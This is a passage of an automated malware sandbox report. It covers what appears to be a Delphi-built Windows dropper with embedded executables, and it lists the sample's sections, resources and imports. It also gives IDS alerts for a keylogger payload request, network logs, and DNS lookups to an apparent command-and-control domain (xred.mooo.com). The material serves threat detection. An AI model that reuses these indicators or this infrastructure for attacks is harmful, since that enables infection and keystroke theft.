.rdata	0xa4000	0x39	0x200	a92cf494c617731a527994013429ad97	False	0.119140625	MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"	0.7846201577093705	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0xa5000	0xa980	0xaa00	dcd1b1c3f3d28d444920211170d1e8e6	False	0.5899816176470588	data	6.674124985579511	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0xb0000	0xdd0740	0xdd0800	9a0296585b2d399a9526197b6ec43713	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0xb0dc8	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"			0.38636363636363635
RT_CURSOR	0xb0efc	0x134	data			0.4642857142857143
RT_CURSOR	0xb1030	0x134	data			0.4805194805194805
RT_CURSOR	0xb1164	0x134	data			0.38311688311688313
RT_CURSOR	0xb1298	0x134	data			0.36038961038961037
RT_CURSOR	0xb13cc	0x134	data			0.4090909090909091
RT_CURSOR	0xb1500	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"			0.4967532467532468
RT_BITMAP	0xb1634	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xb1804	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380			0.46487603305785125
RT_BITMAP	0xb19e8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xb1bb8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39870689655172414
RT_BITMAP	0xb1d88	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.4245689655172414
RT_BITMAP	0xb1f58	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5021551724137931
RT_BITMAP	0xb2128	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5064655172413793
RT_BITMAP	0xb22f8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xb24c8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5344827586206896
RT_BITMAP	0xb2698	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xb2868	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.4870689655172414
RT_ICON	0xb2950	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096			0.12453095684803002
RT_ICON	0xb39f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 8192	Turkish	Turkey	0.2101313320825516
RT_DIALOG	0xb4aa0	0x52	data			0.7682926829268293
RT_STRING	0xb4af4	0x358	data			0.3796728971962617
RT_STRING	0xb4e4c	0x428	data			0.37406015037593987
RT_STRING	0xb5274	0x3a4	data			0.40879828326180256
RT_STRING	0xb5618	0x3bc	data			0.33472803347280333
RT_STRING	0xb59d4	0x2d4	data			0.4654696132596685
RT_STRING	0xb5ca8	0x334	data			0.42804878048780487
RT_STRING	0xb5fdc	0x42c	data			0.42602996254681647
RT_STRING	0xb6408	0x1f0	data			0.4213709677419355
RT_STRING	0xb65f8	0x1c0	data			0.44419642857142855
RT_STRING	0xb67b8	0xdc	data			0.6
RT_STRING	0xb6894	0x320	data			0.45125
RT_STRING	0xb6bb4	0xd8	data			0.5879629629629629
RT_STRING	0xb6c8c	0x118	data			0.5678571428571428
RT_STRING	0xb6da4	0x268	data			0.4707792207792208
RT_STRING	0xb700c	0x3f8	data			0.37598425196850394
RT_STRING	0xb7404	0x378	data			0.41103603603603606
RT_STRING	0xb777c	0x380	data			0.35379464285714285
RT_STRING	0xb7afc	0x374	data			0.4061085972850679
RT_STRING	0xb7e70	0xe0	data			0.5535714285714286
RT_STRING	0xb7f50	0xbc	data			0.526595744680851
RT_STRING	0xb800c	0x368	data			0.40940366972477066
RT_STRING	0xb8374	0x3fc	data			0.34901960784313724
RT_STRING	0xb8770	0x2fc	data			0.36649214659685864
RT_STRING	0xb8a6c	0x354	data			0.31572769953051644
RT_RCDATA	0xb8dc0	0x44	data			0.8676470588235294
RT_RCDATA	0xb8e04	0x10	data			1.5
RT_RCDATA	0xb8e14	0xdbea10	PE32 executable (GUI) Intel 80386, for MS Windows			0.7639369964599609
RT_RCDATA	0xe77824	0x3	ASCII text, with no line terminators	Turkish	Turkey	3.6666666666666665
RT_RCDATA	0xe77828	0x3c00	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	Turkish	Turkey	0.54296875
RT_RCDATA	0xe7b428	0x64c	data			0.5998759305210918
RT_RCDATA	0xe7ba74	0x153	Delphi compiled form 'TFormVir'			0.7522123893805309
RT_RCDATA	0xe7bbc8	0x47d3	Microsoft Excel 2007+	Turkish	Turkey	0.8675150921846957
RT_GROUP_CURSOR	0xe8039c	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0xe803b0	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0xe803c4	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0xe803d8	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0xe803ec	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0xe80400	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0xe80414	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_ICON	0xe80428	0x14	data	Turkish	Turkey	1.1
RT_VERSION	0xe8043c	0x304	data	Turkish	Turkey	0.42875647668393785

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
kernel32.dll	lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
ole32.dll	CLSIDFromString
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll	CLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
oleaut32.dll	GetErrorInfo, SysFreeString
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
shell32.dll	ShellExecuteExA, ExtractIconExW
wininet.dll	InternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
shell32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
advapi32.dll	OpenSCManagerA, CloseServiceHandle
wsock32.dll	WSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
netapi32.dll	Netbios

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-02T20:41:48.778198+0100	2832617	ETPRO MALWARE W32.Bloat-A Checkin	1	192.168.2.6	49755	69.42.215.252	80	TCP
2025-01-02T20:42:47.971516+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.6	49998	142.250.186.78	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 20:41:48.156832933 CET	49755	80	192.168.2.6	69.42.215.252
Jan 2, 2025 20:41:48.161662102 CET	80	49755	69.42.215.252	192.168.2.6
Jan 2, 2025 20:41:48.161742926 CET	49755	80	192.168.2.6	69.42.215.252
Jan 2, 2025 20:41:48.162491083 CET	49755	80	192.168.2.6	69.42.215.252
Jan 2, 2025 20:41:48.167296886 CET	80	49755	69.42.215.252	192.168.2.6
Jan 2, 2025 20:41:48.776535988 CET	80	49755	69.42.215.252	192.168.2.6
Jan 2, 2025 20:41:48.778198004 CET	49755	80	192.168.2.6	69.42.215.252
Jan 2, 2025 20:42:18.783174992 CET	80	49755	69.42.215.252	192.168.2.6
Jan 2, 2025 20:42:18.783334017 CET	49755	80	192.168.2.6	69.42.215.252
Jan 2, 2025 20:42:46.916098118 CET	49998	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:46.916143894 CET	443	49998	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:46.916220903 CET	49998	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:46.929414988 CET	49998	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:46.929442883 CET	443	49998	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:47.573173046 CET	443	49998	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:47.573257923 CET	49998	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:47.574018955 CET	443	49998	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:47.574111938 CET	49998	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:47.624901056 CET	49998	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:47.624943972 CET	443	49998	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:47.625458956 CET	443	49998	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:47.625555038 CET	49998	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:47.627873898 CET	49998	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:47.671350002 CET	443	49998	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:47.971548080 CET	443	49998	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:47.971641064 CET	49998	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:47.971677065 CET	443	49998	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:47.971784115 CET	49998	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:47.971829891 CET	49998	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:47.971873045 CET	443	49998	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:47.971962929 CET	49998	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:48.011054993 CET	49999	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:48.011090994 CET	443	49999	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:48.011693001 CET	49999	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:48.011965990 CET	49999	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:48.011976957 CET	443	49999	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:48.682066917 CET	443	49999	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:48.682154894 CET	49999	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:48.687321901 CET	49999	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:48.687334061 CET	443	49999	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:48.687629938 CET	443	49999	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:48.687704086 CET	49999	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:48.688051939 CET	49999	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:48.735338926 CET	443	49999	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:49.092958927 CET	443	49999	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:49.093004942 CET	443	49999	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:49.093041897 CET	49999	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:49.093066931 CET	443	49999	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:49.093082905 CET	49999	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:49.093115091 CET	443	49999	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:49.093159914 CET	49999	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:49.099598885 CET	49999	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:49.099615097 CET	443	49999	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:49.196717978 CET	50000	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:49.196736097 CET	443	50000	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:49.196933031 CET	50000	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:49.197200060 CET	50000	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:49.197211027 CET	443	50000	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:49.853894949 CET	443	50000	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:49.853971958 CET	50000	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:49.854882956 CET	443	50000	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:49.854928970 CET	50000	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:49.856741905 CET	50000	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:49.856746912 CET	443	50000	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:49.857064962 CET	443	50000	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:49.857112885 CET	50000	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:49.857625008 CET	50000	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:49.903331995 CET	443	50000	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:50.245628119 CET	443	50000	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:50.245701075 CET	50000	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:50.245738029 CET	443	50000	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:50.245843887 CET	50000	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:50.245980978 CET	50000	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:50.246021032 CET	443	50000	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:50.246220112 CET	443	50000	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:50.246548891 CET	50000	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:50.246548891 CET	50000	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:50.294058084 CET	50003	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:50.294112921 CET	443	50003	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:50.294560909 CET	50003	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:50.294661999 CET	50003	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:50.294671059 CET	443	50003	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:50.952342033 CET	443	50003	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:50.952502966 CET	50003	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:50.960339069 CET	50003	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:50.960371971 CET	443	50003	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:50.960608006 CET	50003	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:50.960613012 CET	443	50003	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:51.373915911 CET	443	50003	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:51.373965025 CET	443	50003	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:51.373972893 CET	50003	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:51.373982906 CET	443	50003	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:51.374028921 CET	50003	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:51.374041080 CET	443	50003	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:51.374093056 CET	443	50003	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:51.374245882 CET	50003	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:51.374739885 CET	50003	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:51.374754906 CET	443	50003	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:51.491368055 CET	50004	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:51.491394997 CET	443	50004	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:51.491466999 CET	50004	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:51.491722107 CET	50004	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:51.491731882 CET	443	50004	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:52.139600039 CET	443	50004	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:52.140089989 CET	50004	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:52.140378952 CET	443	50004	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:52.140455961 CET	50004	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:52.142200947 CET	50004	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:52.142209053 CET	443	50004	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:52.142513037 CET	443	50004	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:52.143028021 CET	50004	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:52.143511057 CET	50004	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:52.187338114 CET	443	50004	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:52.533157110 CET	443	50004	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:52.533341885 CET	50004	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:52.533447027 CET	443	50004	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:52.533552885 CET	50004	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:52.533665895 CET	50004	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:52.533729076 CET	443	50004	142.250.186.78	192.168.2.6
Jan 2, 2025 20:42:52.533783913 CET	50004	443	192.168.2.6	142.250.186.78
Jan 2, 2025 20:42:52.613600969 CET	50005	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:52.613646030 CET	443	50005	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:52.613760948 CET	50005	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:52.614053011 CET	50005	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:52.614068031 CET	443	50005	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:53.261007071 CET	443	50005	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:53.261168003 CET	50005	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:53.261760950 CET	50005	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:53.261770964 CET	443	50005	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:53.261979103 CET	50005	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:53.261986017 CET	443	50005	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:53.678931952 CET	443	50005	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:53.678992987 CET	443	50005	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:53.679054022 CET	50005	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:53.679076910 CET	443	50005	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:53.679106951 CET	443	50005	142.250.186.97	192.168.2.6
Jan 2, 2025 20:42:53.679289103 CET	50005	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:53.679770947 CET	50005	443	192.168.2.6	142.250.186.97
Jan 2, 2025 20:42:53.679783106 CET	443	50005	142.250.186.97	192.168.2.6
Jan 2, 2025 20:43:37.997030973 CET	49755	80	192.168.2.6	69.42.215.252
Jan 2, 2025 20:43:38.309190989 CET	49755	80	192.168.2.6	69.42.215.252
Jan 2, 2025 20:43:38.918639898 CET	49755	80	192.168.2.6	69.42.215.252
Jan 2, 2025 20:43:40.121720076 CET	49755	80	192.168.2.6	69.42.215.252
Jan 2, 2025 20:43:42.528003931 CET	49755	80	192.168.2.6	69.42.215.252
Jan 2, 2025 20:43:47.340480089 CET	49755	80	192.168.2.6	69.42.215.252
Jan 2, 2025 20:43:56.949992895 CET	49755	80	192.168.2.6	69.42.215.252

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 20:41:47.993088007 CET	59783	53	192.168.2.6	1.1.1.1
Jan 2, 2025 20:41:48.000421047 CET	53	59783	1.1.1.1	192.168.2.6
Jan 2, 2025 20:41:48.024867058 CET	60761	53	192.168.2.6	1.1.1.1
Jan 2, 2025 20:41:48.151300907 CET	53	60761	1.1.1.1	192.168.2.6
Jan 2, 2025 20:42:46.908301115 CET	53315	53	192.168.2.6	1.1.1.1
Jan 2, 2025 20:42:46.915191889 CET	53	53315	1.1.1.1	192.168.2.6
Jan 2, 2025 20:42:48.002453089 CET	51572	53	192.168.2.6	1.1.1.1
Jan 2, 2025 20:42:48.009958029 CET	53	51572	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 2, 2025 20:41:47.993088007 CET	192.168.2.6	1.1.1.1	0xa9a1	Standard query (0)	xred.mooo.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:41:48.024867058 CET	192.168.2.6	1.1.1.1	0x6d24	Standard query (0)	freedns.afraid.org	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:42:46.908301115 CET	192.168.2.6	1.1.1.1	0x48d2	Standard query (0)	docs.google.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:42:48.002453089 CET	192.168.2.6	1.1.1.1	0x8736	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
